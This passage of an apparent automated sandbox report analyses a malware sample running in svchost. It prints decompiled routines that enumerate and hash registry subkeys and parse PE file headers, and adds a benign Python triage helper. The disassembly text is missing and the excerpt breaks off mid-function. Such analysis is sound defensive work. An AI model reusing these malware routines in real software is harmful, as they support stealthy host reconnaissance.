• Instruction Fuzzy Hash: 7E51A2B09057456FF330AF658C85F27BAECFBA5708F04495DA94A821C2D774A908CBAD
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 1000 25173ff-2517419 1001 251741b 1000->1001 1002 251741d-2517422 1000->1002 1001->1002 1003 2517424 1002->1003 1004 2517426-251742b 1002->1004 1003->1004 1005 2517430-2517435 1004->1005 1006 251742d 1004->1006 1007 2517437 1005->1007 1008 251743a-2517481 call 2516dc2 call 2512544 RegOpenKeyExA 1005->1008 1006->1005 1007->1008 1013 2517487-251749d call 251ee2a 1008->1013 1014 25177f9-25177fe call 251ee2a 1008->1014 1020 2517703-251770e RegEnumKeyA 1013->1020 1019 2517801 1014->1019 1021 2517804-2517808 1019->1021 1022 25174a2-25174b1 call 2516cad 1020->1022 1023 2517714-251771d RegCloseKey 1020->1023 1026 25174b7-25174cc call 251f1a5 1022->1026 1027 25176ed-2517700 1022->1027 1023->1019 1026->1027 1030 25174d2-25174f8 RegOpenKeyExA 1026->1030 1027->1020 1031 2517727-251772a 1030->1031 1032 25174fe-2517530 call 2512544 RegQueryValueExA 1030->1032 1033 2517755-2517764 call 251ee2a 1031->1033 1034 251772c-2517740 call 251ef00 1031->1034 1032->1031 1040 2517536-251753c 1032->1040 1045 25176df-25176e2 1033->1045 1042 2517742-2517745 RegCloseKey 1034->1042 1043 251774b-251774e 1034->1043 1044 251753f-2517544 1040->1044 1042->1043 1047 25177ec-25177f7 RegCloseKey 1043->1047 1044->1044 1046 2517546-251754b 1044->1046 1045->1027 1048 25176e4-25176e7 RegCloseKey 1045->1048 1046->1033 1049 2517551-251756b call 251ee95 1046->1049 1047->1021 1048->1027 1049->1033 1052 2517571-2517593 call 2512544 call 251ee95 1049->1052 1057 2517753 1052->1057 1058 2517599-25175a0 1052->1058 1057->1033 1059 25175a2-25175c6 call 251ef00 call 251ed03 1058->1059 1060 25175c8-25175d7 call 251ed03 1058->1060 1066 25175d8-25175da 1059->1066 1060->1066 1068 25175dc 1066->1068 1069 25175df-2517623 call 251ee95 call 2512544 call 251ee95 call 251ee2a 1066->1069 1068->1069 1078 2517626-251762b 1069->1078 1078->1078 1079 251762d-2517634 1078->1079 1080 2517637-251763c 1079->1080 1080->1080 1081 251763e-2517642 1080->1081 1082 2517644-2517656 call 251ed77 1081->1082 1083 251765c-2517673 call 251ed23 1081->1083 1082->1083 1088 2517769-251777c call 251ef00 1082->1088 1089 2517680 1083->1089 1090 2517675-251767e 1083->1090 1096 25177e3-25177e6 RegCloseKey 1088->1096 1092 2517683-251768e call 2516cad 1089->1092 1090->1092 1097 2517722-2517725 1092->1097 1098 2517694-25176bf call 251f1a5 call 2516c96 1092->1098 1096->1047 1099 25176dd 1097->1099 1104 25176c1-25176c7 1098->1104 1105 25176d8 1098->1105 1099->1045 1104->1105 1106 25176c9-25176d2 1104->1106 1105->1099 1106->1105 1107 251777e-2517797 GetFileAttributesExA 1106->1107 1108 2517799 1107->1108 1109 251779a-251779f 1107->1109 1108->1109 1110 25177a1 1109->1110 1111 25177a3-25177a8 1109->1111 1110->1111 1112 25177c4-25177c8 1111->1112 1113 25177aa-25177c0 call 251ee08 1111->1113 1115 25177d7-25177dc 1112->1115 1116 25177ca-25177d6 call 251ef00 1112->1116 1113->1112 1119 25177e0-25177e2 1115->1119 1120 25177de 1115->1120 1116->1115 1119->1096 1120->1119
C-Code - Quality: 76%
			E025173FF(void* __ecx, intOrPtr* _a4, signed int* _a8, int** _a12, char* _a16, char* _a20) {
				CHAR* _v8;
				void* _v12;
				int _v16;
				void* _v20;
				int* _v24;
				char* _v28;
				intOrPtr _v32;
				int _v36;
				char _v295;
				char _v296;
				char _v556;
				void _v592;
				intOrPtr* _t85;
				int** _t86;
				char* _t87;
				char* _t88;
				char* _t91;
				long _t92;
				signed int _t93;
				long _t97;
				signed int _t103;
				long _t107;
				char* _t118;
				intOrPtr* _t119;
				CHAR* _t123;
				void* _t125;
				char* _t127;
				intOrPtr* _t134;
				void* _t136;
				intOrPtr _t137;
				signed int* _t146;
				int** _t147;
				void* _t160;
				signed int _t163;
				intOrPtr _t164;
				void* _t165;
				intOrPtr _t167;
				intOrPtr _t172;
				intOrPtr* _t173;
				void* _t186;
				intOrPtr _t187;
				int* _t188;
				void* _t190;
				void* _t191;
				char* _t192;
				signed int _t194;
				int* _t196;
				void* _t202;
				void* _t203;
				void* _t204;
				void* _t206;

				_t165 = __ecx;
				_t85 = _a8;
				_t188 = 0;
				_v16 = 0x104;
				if(_t85 != 0) {
					 *_t85 = 0;
				}
				_t86 = _a12;
				if(_t86 != _t188) {
					 *_t86 = _t188;
				}
				_t87 = _a16;
				if(_t87 != _t188) {
					 *_t87 = 0;
				}
				_t88 = _a20;
				if(_t88 != _t188) {
					 *_t88 = 0;
				}
				_v32 = E02516DC2(_t165);
				_t160 = 0xe4;
				_t91 = E02512544(0x25222f8, 0x25206e8, 0x22, 0xe4, 0xc8);
				_t204 = _t203 + 0x14;
				_t92 = RegOpenKeyExA(0x80000002, _t91, _t188, 0x20119,  &_v20); // executed
				_push(0x100);
				_push(_t188);
				_push(0x25222f8);
				if(_t92 != 0) {
					_t93 = E0251EE2A(_t165);
					goto L66;
				} else {
					E0251EE2A(_t165);
					_t206 = _t204 + 0xc;
					_push(_v16);
					_push( &_v556);
					_v24 = _t188;
					_push(_t188);
					while(1) {
						_t97 = RegEnumKeyA(_v20, ??, ??, ??); // executed
						if(_t97 != 0) {
							break;
						}
						if(E02516CAD( &_v556) == 0) {
							L41:
							_v24 =  &(_v24[0]);
							_push(0x104);
							_v16 = 0x104;
							_push( &_v556);
							_push(_v24);
							continue;
						}
						_t103 = E0251F1A5( &_v556);
						_pop(_t167);
						if((_t103 ^ 0x5e5e5e5e) != _v32) {
							goto L41;
						}
						_v12 = _t188;
						_v16 = 0x104;
						_t107 = RegOpenKeyExA(_v20,  &_v556, _t188, 0x101,  &_v12); // executed
						if(_t107 != _t188) {
							L45:
							if(_t107 != 5) {
								L50:
								E0251EE2A(_t167, 0x25222f8, _t188, 0x100);
								_t206 = _t206 + 0xc;
								L39:
								if(_v12 != _t188) {
									RegCloseKey(_v12);
                                                                                                                                  								}
                                                                                                                                  								goto L41;
                                                                                                                                  							}
                                                                                                                                  							E0251EF00(_a16,  &_v556);
                                                                                                                                  							if(_v12 != _t188) {
                                                                                                                                  								RegCloseKey(_v12);
                                                                                                                                  							}
                                                                                                                                  							_push(4);
                                                                                                                                  							_pop(0);
                                                                                                                                  							L64:
                                                                                                                                  							RegCloseKey(_v20);
                                                                                                                                  							return 0;
                                                                                                                                  						}
                                                                                                                                  						_t118 = E02512544(0x25222f8, 0x25206dc, 0xa, _t160, 0xc8);
                                                                                                                                  						_t206 = _t206 + 0x14;
                                                                                                                                  						_t107 = RegQueryValueExA(_v12, _t118, _t188,  &_v36,  &_v296,  &_v16); // executed
                                                                                                                                  						if(_t107 != _t188) {
                                                                                                                                  							goto L45;
                                                                                                                                  						}
                                                                                                                                  						_t119 =  &_v556;
                                                                                                                                  						_t186 = _t119 + 1;
                                                                                                                                  						do {
                                                                                                                                  							_t167 =  *_t119;
                                                                                                                                  							_t119 = _t119 + 1;
                                                                                                                                  						} while (_t167 != 0);
                                                                                                                                  						if(_v16 <= _t119 - _t186) {
                                                                                                                                  							goto L50;
                                                                                                                                  						}
                                                                                                                                  						_t123 = E0251EE95( &_v296,  &_v556);
                                                                                                                                  						_pop(_t167);
                                                                                                                                  						_v8 = _t123;
                                                                                                                                  						if(_t123 == _t188) {
                                                                                                                                  							goto L50;
                                                                                                                                  						}
                                                                                                                                  						_t125 = E0251EE95(_v8, E02512544(0x25222f8, 0x2520694, 5, _t160, 0xc8));
                                                                                                                                  						_t206 = _t206 + 0x1c;
                                                                                                                                  						if(_t125 == 0) {
                                                                                                                                  							_t188 = 0;
                                                                                                                                  							goto L50;
                                                                                                                                  						}
                                                                                                                                  						if(_v296 != 0x22) {
                                                                                                                                  							_t127 = E0251ED03( &_v296, 0x20);
                                                                                                                                  							_pop(_t167);
                                                                                                                                  						} else {
                                                                                                                                  							E0251EF00( &_v296,  &_v295);
                                                                                                                                  							_t127 = E0251ED03( &_v296, 0x22);
                                                                                                                                  							_t206 = _t206 + 0x10;
                                                                                                                                  						}
                                                                                                                                  						if(_t127 != 0) {
                                                                                                                                  							 *_t127 = 0;
                                                                                                                                  						}
                                                                                                                                  						_v8 = E0251EE95( &_v296,  &_v556);
                                                                                                                                  						_v28 = E0251EE95(_v8, E02512544(0x25222f8, 0x2520694, 5, _t160, 0xc8));
                                                                                                                                  						E0251EE2A(_t167, 0x25222f8, 0, 0x100);
                                                                                                                                  						_t134 = _a4;
                                                                                                                                  						_t206 = _t206 + 0x30;
                                                                                                                                  						_t190 = _t134 + 1;
                                                                                                                                  						do {
                                                                                                                                  							_t172 =  *_t134;
                                                                                                                                  							_t134 = _t134 + 1;
                                                                                                                                  						} while (_t172 != 0);
                                                                                                                                  						_t173 = _v8;
                                                                                                                                  						_t191 = _t134 - _t190;
                                                                                                                                  						_t43 = _t173 + 1; // 0x1
                                                                                                                                  						_t136 = _t43;
                                                                                                                                  						do {
                                                                                                                                  							_t187 =  *_t173;
                                                                                                                                  							_t173 = _t173 + 1;
                                                                                                                                  						} while (_t187 != 0);
                                                                                                                                  						_t174 = _t173 - _t136;
                                                                                                                                  						if(_t191 <= _t173 - _t136 || E0251ED77(_t191 - _t174 + _a4, _v8) != 0) {
                                                                                                                                  							_t192 = _v28;
                                                                                                                                  							 *_t192 = 0;
                                                                                                                                  							_t137 = E0251ED23(_v8, 0x5c);
                                                                                                                                  							_v8 = _t137;
                                                                                                                                  							if(_t137 != 0) {
                                                                                                                                  								_v8 = _v8 + 1;
                                                                                                                                  							} else {
                                                                                                                                  								_v8 =  &_v296;
                                                                                                                                  							}
                                                                                                                                  							if(E02516CAD(_v8) == 0) {
                                                                                                                                  								 *_t192 = 0x2e;
                                                                                                                                  								goto L38;
                                                                                                                                  							} else {
                                                                                                                                  								_t194 = E0251F1A5(_v8) ^ 0x5e5e5e5e;
                                                                                                                                  								_t163 = _t194 >> 0x00000008 & 0x000000ff;
                                                                                                                                  								 *_v28 = 0x2e;
                                                                                                                                  								if(E02516C96(_t194) != 0) {
                                                                                                                                  									L37:
                                                                                                                                  									_t160 = 0xe4;
                                                                                                                                  									L38:
                                                                                                                                  									_t188 = 0;
                                                                                                                                  									goto L39;
                                                                                                                                  								}
                                                                                                                                  								_t56 = _t163 - 0x51; // -81
                                                                                                                                  								if(_t56 > 0x2e || (_t194 & 0x000000ff) >= 0x10) {
                                                                                                                                  									goto L37;
                                                                                                                                  								} else {
                                                                                                                                  									_t196 = 0;
                                                                                                                                  									if(GetFileAttributesExA( &_v296, 0,  &_v592) != 0) {
                                                                                                                                  										_t196 = 1;
                                                                                                                                  									}
                                                                                                                                  									_t146 = _a8;
                                                                                                                                  									if(_t146 != 0) {
                                                                                                                                  										 *_t146 = _t163;
                                                                                                                                  									}
                                                                                                                                  									_t164 = _a16;
                                                                                                                                  									if(_t164 != 0) {
                                                                                                                                  										_t202 = _v8 -  &_v296;
                                                                                                                                  										E0251EE08(_t164,  &_v296, _t202);
                                                                                                                                  										 *((char*)(_t202 + _t164)) = 0;
                                                                                                                                  									}
                                                                                                                                  									if(_a20 != 0) {
                                                                                                                                  										E0251EF00(_a20, _v8);
                                                                                                                                  									}
                                                                                                                                  									_t147 = _a12;
                                                                                                                                  									if(_t147 != 0) {
                                                                                                                                  										 *_t147 = _t196;
                                                                                                                                  									}
                                                                                                                                  									_push(3);
                                                                                                                                  									_pop(0);
                                                                                                                                  									goto L63;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						} else {
                                                                                                                                  							E0251EF00(_a16,  &_v556);
                                                                                                                                  							L63:
                                                                                                                                  							RegCloseKey(_v12); // executed
                                                                                                                                  							goto L64;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					_t93 = RegCloseKey(_v20);
                                                                                                                                  					L66:
                                                                                                                                  					return _t93 | 0xffffffff;
                                                                                                                                  				}
                                                                                                                                  			}
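What the decompiled routine above visibly does with each enumerated subkey: it opens the subkey with RegOpenKeyExA using access mask 0x101 (KEY_QUERY_VALUE | KEY_WOW64_64KEY), reads one string value with RegQueryValueExA, and then normalises the value data like a command line: if the first byte is a double quote (0x22) the buffer is shifted left by one and cut at the closing quote, otherwise it is cut at the first space (0x20); the file name is taken after the last backslash (0x5c), the extension is temporarily terminated and later restored with a '.' (0x2e), and the path is tested with GetFileAttributesExA. Any RegOpenKeyExA error other than ERROR_ACCESS_DENIED (5) just moves on to the next subkey; an access-denied result copies the subkey name to the caller's buffer and returns 0. The Python below is an added example for triage, not code from the report or from the sample. It reimplements only that parsing logic and assumes, from their call shapes, that E0251EF00, E0251ED03, E0251ED23 and E0251EE95 behave like strcpy, strchr, strrchr and strstr; the name checks E02516CAD and E0251F1A5 and the XOR constant 0x5e5e5e5e are not reproduced because the report does not show what they compute. The sample value strings are constructed.

```python
"""Triage helper mirroring the registry command-value parsing seen in the listing.

Added example, not the report's or the sample's own code. The sample's helpers
(E0251EF00/E0251ED03/E0251ED23/E0251EE95) are assumed to be strcpy/strchr/
strrchr/strstr equivalents; its name-check and hashing helpers are not reproduced.
"""
import os
from dataclasses import dataclass
from typing import Callable, Dict, Tuple

try:
    import winreg  # present on Windows only; the parsing below does not need it
except ImportError:  # pragma: no cover
    winreg = None


@dataclass
class ParsedValue:
    path: str        # executable path isolated from the value data
    directory: str   # text up to and including the last backslash ('' if none)
    basename: str    # file name after the last backslash
    stem: str        # basename without its extension
    exists: bool     # existence check (GetFileAttributesExA in the sample)


def isolate_path(value_data: str) -> str:
    """Quote handling as in the listing: data starting with 0x22 is shifted left
    by one (strcpy(buf, buf + 1)) and cut at the closing quote; anything else is
    cut at the first space (0x20). No terminator means the whole buffer is used."""
    if value_data.startswith('"'):
        body = value_data[1:]
        end = body.find('"')
    else:
        body = value_data
        end = body.find(' ')
    return body if end < 0 else body[:end]


def split_basename(path: str) -> Tuple[str, str]:
    """strrchr(path, 0x5c): the text after the last backslash is the file name;
    with no backslash the listing falls back to the start of the buffer."""
    idx = path.rfind('\\')
    if idx < 0:
        return '', path
    return path[:idx + 1], path[idx + 1:]


def parse_registry_command(value_data: str,
                           exists: Callable[[str], bool] = os.path.exists) -> ParsedValue:
    """Parse one REG_SZ command value the way the decompiled routine does.
    `exists` is injectable so the logic can be exercised off-box."""
    path = isolate_path(value_data)
    directory, basename = split_basename(path)
    stem = basename.rsplit('.', 1)[0]   # 'svc.exe' -> 'svc'; 'svc' stays 'svc'
    return ParsedValue(path, directory, basename, stem, bool(exists(path)))


# Constructed sample values (hypothetical, not taken from the report).
SAMPLE_VALUES = {
    'svc': '"C:\\Program Files\\Example\\svc.exe" -run',
    'upd': 'C:\\Windows\\upd.exe /silent',
    'bare': 'rundll32.exe payload.dll,Entry',
}


def parse_samples(exists: Callable[[str], bool] = lambda _p: False) -> Dict[str, ParsedValue]:
    """Run the parser over the constructed samples; returns name -> ParsedValue."""
    return {name: parse_registry_command(data, exists) for name, data in SAMPLE_VALUES.items()}


def scan_key(root: int, parent: str, value_name: str) -> Dict[str, ParsedValue]:
    """Windows only: enumerate the subkeys of `parent` and parse `value_name` in each.
    Each subkey is opened with the access mask the sample uses
    (0x101 = KEY_QUERY_VALUE | KEY_WOW64_64KEY)."""
    if winreg is None:
        raise RuntimeError('winreg is only available on Windows')
    found: Dict[str, ParsedValue] = {}
    with winreg.OpenKey(root, parent, 0, winreg.KEY_READ) as key:
        for i in range(winreg.QueryInfoKey(key)[0]):
            name = winreg.EnumKey(key, i)
            try:
                with winreg.OpenKey(key, name, 0,
                                    winreg.KEY_QUERY_VALUE | winreg.KEY_WOW64_64KEY) as sub:
                    data, kind = winreg.QueryValueEx(sub, value_name)
            except OSError:
                continue   # value missing or key unreadable: move to the next subkey
            if kind in (winreg.REG_SZ, winreg.REG_EXPAND_SZ):
                found[name] = parse_registry_command(data)
    return found


if __name__ == '__main__':
    for name, parsed in parse_samples().items():
        print(f'{name}: dir={parsed.directory!r} file={parsed.basename!r} stem={parsed.stem!r}')
```

On a live Windows host, scan_key(winreg.HKEY_LOCAL_MACHINE, r'SOFTWARE\...', 'SomeValue') runs the same open/query loop against a real key; the parent key and value name are the analyst's choice, since the report does not name the key this routine is given.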

[Address column of the disassembly listing for this routine (0x025173ff to 0x025177ec); the instruction text did not survive extraction.]
                                                                                                                                  0x025177ef
                                                                                                                                  0x00000000
                                                                                                                                  0x025177f5
                                                                                                                                  0x0251751c
                                                                                                                                  0x02517521
                                                                                                                                  0x02517528
                                                                                                                                  0x02517530
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02517536
                                                                                                                                  0x0251753c
                                                                                                                                  0x0251753f
                                                                                                                                  0x0251753f
                                                                                                                                  0x02517541
                                                                                                                                  0x02517542
                                                                                                                                  0x0251754b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251755f
                                                                                                                                  0x02517565
                                                                                                                                  0x02517566
                                                                                                                                  0x0251756b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02517589
                                                                                                                                  0x0251758e
                                                                                                                                  0x02517593
                                                                                                                                  0x02517753
                                                                                                                                  0x00000000
                                                                                                                                  0x02517753
                                                                                                                                  0x025175a0
                                                                                                                                  0x025175d1
                                                                                                                                  0x025175d7
                                                                                                                                  0x025175a2
                                                                                                                                  0x025175b0
                                                                                                                                  0x025175be
                                                                                                                                  0x025175c3
                                                                                                                                  0x025175c3
                                                                                                                                  0x025175da
                                                                                                                                  0x025175dc
                                                                                                                                  0x025175dc
                                                                                                                                  0x025175fc
                                                                                                                                  0x02517615
                                                                                                                                  0x02517618
                                                                                                                                  0x0251761d
                                                                                                                                  0x02517620
                                                                                                                                  0x02517623
                                                                                                                                  0x02517626
                                                                                                                                  0x02517626
                                                                                                                                  0x02517628
                                                                                                                                  0x02517629
                                                                                                                                  0x0251762d
                                                                                                                                  0x02517632
                                                                                                                                  0x02517634
                                                                                                                                  0x02517634
                                                                                                                                  0x02517637
                                                                                                                                  0x02517637
                                                                                                                                  0x02517639
                                                                                                                                  0x0251763a
                                                                                                                                  0x0251763e
                                                                                                                                  0x02517642
                                                                                                                                  0x0251765c
                                                                                                                                  0x02517664
                                                                                                                                  0x02517667
                                                                                                                                  0x0251766e
                                                                                                                                  0x02517673
                                                                                                                                  0x02517680
                                                                                                                                  0x02517675
                                                                                                                                  0x0251767b
                                                                                                                                  0x0251767b
                                                                                                                                  0x0251768e
                                                                                                                                  0x02517722
                                                                                                                                  0x00000000
                                                                                                                                  0x02517694
                                                                                                                                  0x025176a1
                                                                                                                                  0x025176ad
                                                                                                                                  0x025176b3
                                                                                                                                  0x025176bf
                                                                                                                                  0x025176d8
                                                                                                                                  0x025176d8
                                                                                                                                  0x025176dd
                                                                                                                                  0x025176dd
                                                                                                                                  0x00000000
                                                                                                                                  0x025176dd
                                                                                                                                  0x025176c1
                                                                                                                                  0x025176c7
                                                                                                                                  0x00000000
                                                                                                                                  0x0251777e
                                                                                                                                  0x02517785
                                                                                                                                  0x02517797
                                                                                                                                  0x02517799
                                                                                                                                  0x02517799
                                                                                                                                  0x0251779a
                                                                                                                                  0x0251779f
                                                                                                                                  0x025177a1
                                                                                                                                  0x025177a1
                                                                                                                                  0x025177a3
                                                                                                                                  0x025177a8
                                                                                                                                  0x025177b3
                                                                                                                                  0x025177b8
                                                                                                                                  0x025177c0
                                                                                                                                  0x025177c0
                                                                                                                                  0x025177c8
                                                                                                                                  0x025177d0
                                                                                                                                  0x025177d6
                                                                                                                                  0x025177d7
                                                                                                                                  0x025177dc
                                                                                                                                  0x025177de
                                                                                                                                  0x025177de
                                                                                                                                  0x025177e0
                                                                                                                                  0x025177e2
                                                                                                                                  0x00000000
                                                                                                                                  0x025177e2
                                                                                                                                  0x025176c7
                                                                                                                                  0x02517769
                                                                                                                                  0x02517773
                                                                                                                                  0x025177e3
                                                                                                                                  0x025177e6
                                                                                                                                  0x00000000
                                                                                                                                  0x025177e6
                                                                                                                                  0x02517642
                                                                                                                                  0x02517717
                                                                                                                                  0x02517801
                                                                                                                                  0x00000000
                                                                                                                                  0x02517801

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,761B43E0,00000000), ref: 02517472
                                                                                                                                  • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00000101,?,?,?,?,?,?,?,761B43E0,00000000), ref: 025174F0
                                                                                                                                  • RegQueryValueExA.KERNEL32(?,00000000,?,00000000,?,?,00000104,?,?,?,?,?,?,761B43E0,00000000), ref: 02517528
                                                                                                                                  • ___ascii_stricmp.LIBCMT ref: 0251764D
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,761B43E0,00000000), ref: 025176E7
                                                                                                                                  • RegEnumKeyA.ADVAPI32(00000000,00000000,?,00000104), ref: 02517706
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,761B43E0,00000000), ref: 02517717
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,761B43E0,00000000), ref: 02517745
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,761B43E0,00000000), ref: 025177EF
                                                                                                                                    • Part of subcall function 0251F1A5: lstrlenA.KERNEL32(000000C8,000000E4,025222F8,000000C8,02517150,?), ref: 0251F1AD
                                                                                                                                  • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0251778F
                                                                                                                                  • RegCloseKey.KERNEL32(?), ref: 025177E6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
                                                                                                                                  • String ID: "
                                                                                                                                  • API String ID: 3433985886-123907689
                                                                                                                                  • Opcode ID: 6bebcaef6663bdddc9040775c6bcb52350b12c6091c36766004fa7e7bb8f45d0
                                                                                                                                  • Instruction ID: aed274d2402152468edf163d97287ac90788807e36a224d5203a5f502a54ac87
                                                                                                                                  • Opcode Fuzzy Hash: 6bebcaef6663bdddc9040775c6bcb52350b12c6091c36766004fa7e7bb8f45d0
                                                                                                                                  • Instruction Fuzzy Hash: 56C1727194021AABFB219FA8DC45FEEBBBAFF49310F140495E504E6190EB719A44CB68
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                   Basic blocks of the graph (id: address range, API or call made in the block, successor block ids), recovered from the flattened graph data:
                                                                                                                                   • 1122: 251675c-2516778 -> 1123, 1124
                                                                                                                                   • 1123: 2516784-25167a2 CreateFileA -> 1125, 1126
                                                                                                                                   • 1124: 251677a-251677e SetFileAttributesA -> 1123
                                                                                                                                   • 1125: 25167b5-25167b8 -> 1127, 1128
                                                                                                                                   • 1126: 25167a4-25167b2 CreateFileA -> 1125
                                                                                                                                   • 1127: 25167c5-25167c9 -> 1129, 1130
                                                                                                                                   • 1128: 25167ba-25167bf SetFileAttributesA -> 1127
                                                                                                                                   • 1129: 2516977-2516986 (no successors)
                                                                                                                                   • 1130: 25167cf-25167df GetFileSize -> 1131, 1132
                                                                                                                                   • 1131: 25167e5-25167e7 -> 1132, 1133
                                                                                                                                   • 1132: 251696b -> 1134
                                                                                                                                   • 1133: 25167ed-251680b ReadFile -> 1132, 1135
                                                                                                                                   • 1134: 251696e-2516971 FindCloseChangeNotification -> 1129
                                                                                                                                   • 1135: 2516811-2516824 SetFilePointer -> 1132, 1136
                                                                                                                                   • 1136: 251682a-2516842 ReadFile -> 1132, 1137
                                                                                                                                   • 1137: 2516848-2516861 SetFilePointer -> 1132, 1138
                                                                                                                                   • 1138: 2516867-2516876 -> 1139, 1140
                                                                                                                                   • 1139: 25168d5-25168df -> 1134, 1141
                                                                                                                                   • 1140: 2516878-251688f ReadFile -> 1142, 1143
                                                                                                                                   • 1141: 25168e5-25168eb -> 1144, 1145
                                                                                                                                   • 1142: 2516891-251689e -> 1146, 1147
                                                                                                                                   • 1143: 25168d2 -> 1139
                                                                                                                                   • 1144: 25168f0-25168fe call 251ebcc -> 1132, 1153
                                                                                                                                   • 1145: 25168ed -> 1144
                                                                                                                                   • 1146: 25168a0-25168b5 -> 1149
                                                                                                                                   • 1147: 25168b7-25168ba -> 1149
                                                                                                                                   • 1149: 25168bd-25168c3 -> 1151, 1152
                                                                                                                                   • 1151: 25168c5 -> 1152
                                                                                                                                   • 1152: 25168c8-25168ce -> 1140, 1154
                                                                                                                                   • 1153: 2516900-251690b SetFilePointer -> 1155, 1156
                                                                                                                                   • 1154: 25168d0 -> 1139
                                                                                                                                   • 1155: 251695a-2516969 call 251ec2e -> 1134
                                                                                                                                   • 1156: 251690d-2516920 ReadFile -> 1155, 1157
                                                                                                                                   • 1157: 2516922-2516958 -> 1134
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0251675C(CHAR* _a4, long* _a8, long _a12) {
                                                                                                                                  				long _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				struct _OVERLAPPED* _v16;
                                                                                                                                  				long _v20;
                                                                                                                                  				struct _OVERLAPPED* _v24;
                                                                                                                                  				long _v28;
                                                                                                                                  				intOrPtr _v48;
                                                                                                                                  				intOrPtr _v52;
                                                                                                                                  				intOrPtr _v60;
                                                                                                                                  				void _v68;
                                                                                                                                  				long _v72;
                                                                                                                                  				void _v132;
                                                                                                                                  				intOrPtr _v320;
                                                                                                                                  				signed int _v360;
                                                                                                                                  				signed int _v374;
                                                                                                                                  				void _v380;
                                                                                                                                  				void* _t85;
                                                                                                                                  				long _t88;
                                                                                                                                  				int _t92;
                                                                                                                                  				long _t93;
                                                                                                                                  				int _t96;
                                                                                                                                  				long _t99;
                                                                                                                                  				long _t102;
                                                                                                                                  				struct _OVERLAPPED* _t103;
                                                                                                                                  				long _t104;
                                                                                                                                  				long _t115;
                                                                                                                                  				long _t120;
                                                                                                                                  				signed int _t143;
                                                                                                                                  				void* _t146;
                                                                                                                                  
                                                                                                                                  				_v16 = 0;
                                                                                                                                  				_v8 = 0;
                                                                                                                                  				if(_a12 != 0) {
                                                                                                                                  					SetFileAttributesA(_a4, 0x80);
                                                                                                                                  				}
                                                                                                                                  				_t85 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0x80, 0); // executed
                                                                                                                                  				_v12 = _t85;
                                                                                                                                  				if(_t85 == 0xffffffff) {
                                                                                                                                  					_v12 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 4, 0);
                                                                                                                                  				}
                                                                                                                                  				if(_a12 != 0) {
                                                                                                                                  					SetFileAttributesA(_a4, 2);
                                                                                                                                  				}
                                                                                                                                  				if(_v12 != 0xffffffff) {
                                                                                                                                  					_t88 = GetFileSize(_v12, 0);
                                                                                                                                  					_v8 = _t88;
                                                                                                                                  					if(_t88 == 0xffffffff || _t88 == 0) {
                                                                                                                                  						L31:
                                                                                                                                  						_v8 = 0;
                                                                                                                                  					} else {
                                                                                                                                  						_a12 = 0;
                                                                                                                                  						_v28 = 0;
                                                                                                                                  						_t92 = ReadFile(_v12,  &_v132, 0x40,  &_a12, 0); // executed
                                                                                                                                  						if(_t92 == 0) {
                                                                                                                                  							goto L31;
                                                                                                                                  						} else {
                                                                                                                                  							_t93 = SetFilePointer(_v12, _v72, 0, 0); // executed
                                                                                                                                  							if(_t93 == 0xffffffff) {
                                                                                                                                  								goto L31;
                                                                                                                                  							} else {
                                                                                                                                  								_t96 = ReadFile(_v12,  &_v380, 0xf8,  &_v28, 0); // executed
                                                                                                                                  								if(_t96 == 0) {
                                                                                                                                  									goto L31;
                                                                                                                                  								} else {
                                                                                                                                  									_t99 = SetFilePointer(_v12, (_v360 & 0x0000ffff) + _v72 + 0x18, 0, 0); // executed
                                                                                                                                  									if(_t99 == 0xffffffff) {
                                                                                                                                  										goto L31;
                                                                                                                                  									} else {
                                                                                                                                  										_v20 = 0;
                                                                                                                                  										_v24 = 0;
                                                                                                                                  										if(0 < _v374) {
                                                                                                                                  											while(1) {
                                                                                                                                  												_t115 = 0x28;
                                                                                                                                  												_a12 = _t115;
                                                                                                                                  												if(ReadFile(_v12,  &_v68, _t115,  &_a12, 0) == 0) {
                                                                                                                                  													break;
                                                                                                                                  												}
                                                                                                                                  												_t143 = _v374 & 0x0000ffff;
                                                                                                                                  												if(_v24 != _t143 - 1) {
                                                                                                                                  													_t120 = _v48 + _v52;
                                                                                                                                  												} else {
                                                                                                                                  													_t120 = (_v320 + _v60 - 0x00000001 &  !(_v320 - 1)) + _v48;
                                                                                                                                  												}
                                                                                                                                  												_a12 = _t120;
                                                                                                                                  												if(_v20 < _t120) {
                                                                                                                                  													_v20 = _t120;
                                                                                                                                  												}
                                                                                                                                  												_v24 = _v24 + 1;
                                                                                                                                  												if(_v24 < _t143) {
                                                                                                                                  													continue;
                                                                                                                                  												} else {
                                                                                                                                  												}
                                                                                                                                  												goto L23;
                                                                                                                                  											}
                                                                                                                                  											_v8 = 0;
                                                                                                                                  										}
                                                                                                                                  										L23:
                                                                                                                                  										if(_v24 >= (_v374 & 0x0000ffff)) {
